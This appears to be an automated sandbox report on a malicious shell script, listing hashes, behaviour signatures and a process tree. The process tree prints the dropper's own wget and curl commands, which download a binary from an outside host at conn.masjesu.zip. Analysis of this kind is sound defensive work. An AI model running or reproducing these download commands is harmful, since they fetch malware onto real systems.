Analysis

  • max time kernel
    149s
  • max time network
    4s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    24/11/2024, 02:08

General

  • Target

    304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh

  • Size

    10KB

  • MD5

    212b02f29854addd09c83c096b0a28d8

  • SHA1

    6d3e25cbd8a8331cfec87e951c697876d1ce21c5

  • SHA256

    304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788

  • SHA512

    8ae72b9af1d4e17bda84c690db9c365158e62d7dcf4dae5a7f42a9edf5f1faae4b8955062fcadd5a6f40c68045060f91734e883bd234aa98d078149be0382a85

  • SSDEEP

    192:bZR+7fUY+OQy21N8fzFNEZR+7f2Y8D1N8fz8:7OQyPNAV

Score
4/10

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
    /tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
    1⤵
      PID:645
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:646
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm
          2⤵
          • System Network Configuration Discovery
          PID:651
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:656

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads